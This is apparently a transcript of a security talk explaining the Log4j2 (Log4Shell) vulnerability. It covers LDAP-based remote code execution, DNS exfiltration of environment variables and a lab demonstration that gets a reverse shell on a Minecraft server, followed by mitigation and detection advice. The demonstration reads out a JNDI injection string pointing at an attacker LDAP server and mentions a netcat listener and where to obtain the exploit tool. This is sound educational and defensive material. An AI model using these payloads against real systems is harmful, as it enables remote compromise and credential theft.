Hi everybody, my name is Tony Robinson. I'm a senior security analyst with Hurricane Labs. Today I'm going to be talking to you about how I hacked Minecraft, or how Log4j2 can be more destructive than a well-placed creeper. So what purpose does Log4j2 serve, and why is it such a big deal right now? It's a logging library for the Java programming language. It's free and it's open source and provided by the Apache Software Foundation. Like a lot of open source software out there, it's maintained by volunteers who often just kind of do it for the fun or don't even get paid to do it. To that effect, I provided a link to a somewhat snide but altogether true XKCD comic down here, where we see that there's kind of like a Jenga stack of blocks here depicting modern digital infrastructure in the cloud and in enterprise networks all over the place, and you see a tiny little stick piece down in the bottom labeled here, project some person in Nebraska has been thanklessly maintaining since 2003. And that's kind of the story of Log4j2 here, in that it is an open source project that has only been maintained by a handful of people and is used across enterprise networks all over the world. The specific problem being exploited in this vulnerability has to do with functionality added to Log4j2 called lookups. Lookups are a way for programmers to add values to the Log4j2 output in different places as needed. This could be environment variables, program variables, date format strings, and a variety of other data types. I included a link here to the documentation if you want to learn more about what lookups do. If you'd like to see whether or not your Java application in your enterprise network or at home is vulnerable to this exploit, you can enter the format string on the slide here in any sort of a user-controlled field that you think is logged through Log4j2. That could be an HTTP URI, any of your HTTP headers such as a user agent, exported for, input boxes, anything and everything. If you check your logs and you get the current date instead of the string that you put in, you might potentially be vulnerable to this exploit. In the images below, I am playing the game Minecraft in a vulnerable version of Minecraft using the vulnerable Log4j2 library. I input the date string above into a text box, and on the server's console log, we can see that it returns the current date, 12/14/2021. So alone, the ability to inject specific strings into a log file wouldn't be too terribly bad. However, the bigger problem and the issue being exploited with this vulnerability is something called JNDI. JNDI stands for Java Naming and Directory Lookups. It's a way for Java applications to look up data over LDAP, DNS, and or other types of protocols allowed by the standard. I've included a link here to the documentation. This functionality was introduced in Log4j2 back in 2013. For the most part, this vulnerability centers around trying to trigger a JNDI lookup to either use the DNS or LDAP protocols. On this slide, I have included some of the example strings that are used to trigger this vulnerability using both a DNS and an LDAP lookup. As I mentioned in the previous slide, however, this isn't the only attack surface available. There are other protocols that are included in the JNDI standard that might potentially be exploitable as well. So what's the potential for impact from having this vulnerability exploited? Well, first and foremost, this vulnerability could lead to remote code execution. The most common method I've seen being exploited in the wild and with security researchers is called LDAP resource ref. What attackers do is that they will set up a malicious LDAP server, so when this LDAP server receives a JNDI LDAP query, it will tell the vulnerable Java application, the resource you want is over here. It's in this class file. It's totally legitimate, just trust me. And if that Java application is running a vulnerable version of the Java runtime, it will gladly go and download that Java class file and run whatever's in it. In other cases where the application might be vulnerable but is running a newer version of the Java runtime, you'll have what's called deserialization gadgets. These are libraries that might be a part of whatever Java application you're running that have functions that your application might not necessarily be using, but they're there anyhow. An attacker can use these functions to possibly gain code execution on your server. I've included a couple of links to examples that talk about this with Apache Tomcat and Spring Boot. Here's an illustration that I put together that demonstrates exploitation using the LDAP resource ref method. In the first part of this image, we see that a user makes a web request to a Java application with a user agent containing a JNDI lookup. The web server running the application accepts the connection, and then the Java application logs the user agent using a vulnerable version of Log4j2. When it sees the JNDI lookup, it honors the request and sends an LDAP request to the attacker server. The attack server accepts the LDAP query and responds back saying that the resource you're looking for is located at this web server. The Java application is running a version of the Java runtime that has the trust URL codebase option set to true, so it will gladly say, okay, let me go and download that class file. So it'll request the class file from the attacker's web server now, and the web server will respond and give it back the class file, and it'll run whatever's in there. Another potential avenue for exploitation of this vulnerability would be through extracting environment variables on a vulnerable system. When we think about environment variables, we think about how they might give us information or reconnaissance about a system, let us know how it's configured, potentially give us information about the applications that are on the system as well. However, more recently, and in cloud environments especially, such as Amazon's AWS, these environment variables could contain credentials that might give an attacker access to an organization's cloud environment. Now, in order to exploit the vulnerability in this way, there is a little bit of setup involved. The attacker would need to acquire a domain, then set up a DNS server as the authoritative DNS server for that domain, then configure DNS logging for their DNS server to log the DNS queries. Once all that's set up, the attacker would trigger a JNDI lookup against a vulnerable Java application, and within that JNDI lookup, either for LDAP or DNS, they would do a nested lookup for environment variables on the targeted system. That environment variable would be a subdomain of the domain that the attacker owns, so it would trigger a DNS query. That DNS query would get logged whether or not the domain was able to be resolved, and that is a method that the attackers could use to gain more information or potentially exfiltrate credentials from a targeted system or targeted environment. I have a link here on the slide deck to a Twitter thread in which the security researcher Laughing Mantis shows how this method of exploitation is potentially impacting users in AWS. As promised, here's an illustration that kind of shows how this method of exploitation might work. In this method, we assume that the attacker owns the domain seamsleg.it, and that they registered the domain, they set up an authoritative DNS server, and that authoritative DNS server has logging configured for DNS queries. Just like with the first version of this exploit using the LDAP resource ref method, the attacker is going to issue some kind of a request to a potentially vulnerable Java application, and that request is going to have a JNDI lookup. The JNDI lookup in our case also has that secondary lookup for an environment variable. So the web server running Java or whatever application server it is that's running the Java application accepts the connection and sees that JNDI lookup string. It will resolve the environment variable and then see, well, regardless of whether or not this is an LDAP or a DNS JNDI lookup, I need to be able to resolve this domain. So the next step would be sending a DNS query that contains the contents of that variable to a subdomain of seamsleg.it. Now, once that query hits the authoritative DNS server, the attackers now have access to that variable. They have the data that they requested. As it turns out, exploitation through JNDI has been known about for a significant period of time already. A lot of research seemed to crop up around the 2015-2016 period, centering around the WISO serial research into different deserialization methods, a Black Hat talk about the journey from JNDI and LDAP manipulation to remote code execution, as well as research by Moritz Beckler into Java on Marshler security. What I'm getting at is that JNDI as a potential attack surface has been known for some period of time. It just wasn't realized that the Log4j2 library itself had JNDI lookups enabled and configured. As expected by the name of this slide deck, we're going to cap things off here, and I'm going to show you how I exploited Minecraft. Now, before we do that, there's a couple of caveats and a little bit of setup that's involved here. The version of Minecraft that I exploited was the 1.12 server. The current version of Minecraft is 1.18.1, and Mojang actually already fixed the vulnerability. They were pretty fast about it. About a day after the vulnerability was announced, 1.18.1 was released. So, pretty good job on their part getting it out there. Now, you might think, who is going to be running an old version of Minecraft? Well, there are plenty of players out there who might have a significant amount of stuff in their world and they just don't want to upgrade because they don't want to lose all of that progress. And in other cases, there are custom mod packs made by third parties that are only compatible with a specific version of the Minecraft server. Now, in addition to running an old version of the Minecraft server, we need to run an older version of the Java runtime environment. In my case, I'm running Java 8 Update 112 because this was the last update of Java 8 that had the trust URL codebase option set to yes. This is critical for getting the LDAP resource ref remote code execution method to actually trigger. Now, newer versions of Minecraft require newer versions of the Java runtime environment and JDK, so the trust URL codebase option should be set to no by default. And finally, the last part of my setup involves using a tool called JNDI exploit. This tool sets up a malicious LDAP server that will redirect it to a web server that it also sets up to serve the class file to the vulnerable Java application and give us code execution. In my case, I'm going to try to get a reverse shell to trigger off of my Minecraft server. Before we dive into this little tutorial or demonstration, I wanted to take a moment to note that the GitHub repository for JNDI exploit, the tool that I used, has mysteriously fallen off the face of the internet. But as always, the Internet Archive, the Wayback Machine, has the ability to catch things that have fallen off the internet and hold on to them forever. So in order to get access to this tool, I would recommend taking a look at the Internet Archive and looking for this GitHub repository. The URL is right there. Just go to web.archive.org and try searching for that. With that out of the way, I went ahead and set up a test environment to test this vulnerability out. So as a part of this test, I have two systems set up on my network, one that I've affectionately called Dumpster Fire at IP address 10.0.0.10, and the other one here, Blind Pressed, at 10.0.0.13. Now, Dumpster Fire has Minecraft 1.12 running, and we are using the Java runtime environment 1.8.0 update 112. So that's basically just Java 8 U112. So as you can see here, Minecraft is started, it's running on the server. Then on Blind Press, I took the JNDI exploit tool and I told it to run with the argument TAC-I for the IP address and TAC-P for the port for the HTTP server. So I have a listener on my Blind Press virtual machine on port 1389 listening for LDAP requests, and then another listener on port 8888 TCP for HTTP requests. Then, in another connection on Blind Pressed, I set up a Netcat listener on port 6667. This is in order to capture the reverse shell when it comes back from my Minecraft server. Now down here, I have my Minecraft client up, and we're going to connect to the server. And I'm going to open up a chat box here, and we're going to trigger the exploit. $, curly brace, JNDI, LDAP, 10.0.0.13 colon 1389 slash basic slash reverse shell, input the IP address of the Blind Press virtual machine and the TCP port to connect back to, and then close that curly brace. And when we hit enter here, the server is going to shutter for a minute, it's going to freeze, And if we come back to this session here, you can see that we have a shell on the dumpster fire host. And if I input the command IP address, we can confirm that we are on the host 10.0.0.10. I am running as the user who started the Minecraft server, and that's really all there is to it. It's as simple as running a string, and then back here, the JNDI exploit tool captures the LDAP query and redirects the LDAP query to the Java class file that we tell the vulnerable Minecraft server to pick up and run. So we've covered the details of this vulnerability. We've covered the different methods in which it can be exploited. We even did a little bit of a live demo, and I showed you how the popular Minecraft server could be exploited using this vulnerability. The only thing I have left to show you is how to possibly mitigate and remediate this threat. First and foremost, the best way forward, of course, is going to be to patch the vulnerable versions of the Log4j2 library that your Java applications are using. Of course, in many cases, this is going to be much easier said than done because software inventory is extremely difficult to get a handle on. And in many cases, you might be running Java applications and have no idea that they're actually running. In many cases, you might have vendor appliances or vendor software that utilizes Java or might utilize Log4j2 and might not even be aware of it. Or you might have instances where there is Java software that is a critical part of your company or organization's workflow that either the developers are no longer there, the company that it was outsourced to or contracted to develop the software no longer exists, or it's simply too old and too much of considered too critical in infrastructure to want to update without it causing serious problems for the organization and workflows in the organization. But in the cases where you can't do so, I have a couple of other options listed, so not all hope is lost here. The next best thing you can do would be to update the version of the Java runtime that you are using for your Java applications. I have a couple of different versions listed here on this slide, so Java 6 Update 211, 7 Update 201, 8 Update 191, and version 11.0.1 or higher all disable the Trust URL Codebase feature by default. If you were watching the demonstration a little bit ago, the LDAP ref server exploitation method that we use to attack Minecraft requires that this feature be enabled. Unfortunately, this won't fix instances where the attackers are doing environment variable exfiltration or gaining remote code execution through deserialization and gadgets that might exist in your Java applications. Another option available to you for mitigating this vulnerability would be to disable the ability to do JNDI lookups entirely, either by setting the format message no lookups environment variable or command line argument. On the screen here, I have the format for the command line argument as well as the format for the environment variable for disabling message lookups either way. If neither of those are an option and you're feeling particularly brave, you can use the zip command to delete the JNDI lookup manager, JMS appender, and SMTP appender classes to permanently disable the vulnerability. However, this might affect your code in unexpected ways, so I would highly suggest testing this before using this method to remediate the vulnerability. If all else fails and the other mitigation methods are unavailable to you for one reason or another, then the best possible fallback you will have for mitigating this threat will be through defense in depth. That's going to be making use of your standard enterprise defenses and using those to monitor your Java application servers. A lot of the defenses I recommend on this slide are going to rely on you being able to identify what systems are running Java applications in your environment. And again, the software inventory is one of those things that is much easier said than done. But any systems that you are aware of that are running Java applications and accept any kind of user input or network connections that can be user controlled, which are going to be practically all of them, need to be monitored a little bit more closely and with a little bit more care, especially if they use the Log4j2 libraries. So that's going to be making use of egress filtering at your network perimeter to prevent those application servers from making unusual network connections outbound on non-standard ports. A good example of that would be the Minecraft exploit that I demoed a little bit ago. Why is this application server suddenly making TCP connections on port 1389? Why is it making HTTP connections on port 8888? When the majority of HTTP traffic we see are on ports 80 and or port 443. Of course, there are always outliers to that and always applications that do things a little bit differently. But for the most part, if you're seeing HTTP traffic on a port that isn't 80 or 443, especially if it's coming from any of those identified Java application servers, then it might warrant a little bit of a closer look. You should also not be afraid to rely on your endpoint detection and security solutions on the host itself. After all, if Java suddenly starts making outbound network connections, has child processes that it normally doesn't have, or starts dropping files to disk like coin miners or ransomware, I would certainly hope that your EDR or XDR solutions would notify you of that, and those are things that you would consider paying attention to or investigating further to see what's going on there. Consider taking a look at DNS requests coming from those various application servers and appliances as well. Maybe do a sort by least frequent occurrence and look for new DNS queries to different domains that haven't been looked up in the past. You can also consider looking for the JNDI lookup strings in your application and or network traffic logs, such as HTTP logs or proxy logs if you have them, but be aware that there are a lot of different permutations of the JNDI lookup strings, and there are a lot of different ways to obfuscate that string, making the threat hunting and block listing based on just looking for a portion of the JNDI lookup string considerably difficult. And I think that's going to wrap things up here for right now. Folks, I want you to know that this is going to be one of those vulnerabilities that's probably going to be with us for a serious amount of time. I don't think that this is going to be a one and done. I think that attack surface with this vulnerability and the different types of software applications that are vulnerable to it are going to definitely surprise us over the coming weeks or maybe even months or years. This is going to be one to watch out for the near future at the very least. So with that, I just want to say, with the holiday season coming up and with how intense this vulnerability has been and how many different cybersecurity professions have been under pressure the last couple of days, especially with this being something that was dropped on top of us on a Friday, remember that cybersecurity isn't exactly a sprint and it's more of a marathon. So be sure to take care of yourself, take care of your peers. Know that the vulnerabilities are definitely going to be there, and to pace yourself. Take care of yourself this holiday, and I'll look forward to seeing y'all in the new year.